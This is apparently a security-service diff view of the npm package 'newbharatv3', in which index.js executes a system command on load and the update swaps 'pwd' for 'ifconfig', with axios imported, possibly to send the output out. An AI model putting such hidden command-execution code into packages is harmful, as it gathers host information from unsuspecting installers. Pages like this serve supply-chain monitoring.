newbharatv3 1.0.10 → 1.0.12

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -2,7 +2,7 @@ const { exec } = require('child_process');
2
2
  const axios = require('axios');
3
3
 
4
4
  // System command run karna (e.g., 'whoami' ya 'dig example.com')
5
- const command = 'pwd'; // yahan apni desired command likho
5
+ const command = 'ifconfig'; // yahan apni desired command likho
6
6
 
7
7
  exec(command, async (error, stdout, stderr) => {
8
8
  if (error) {
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "newbharatv3",
3
- "version": "1.0.10",
3
+ "version": "1.0.12",
4
4
  "description": "",
5
5
  "main": "index.js",
6
6
  "scripts": {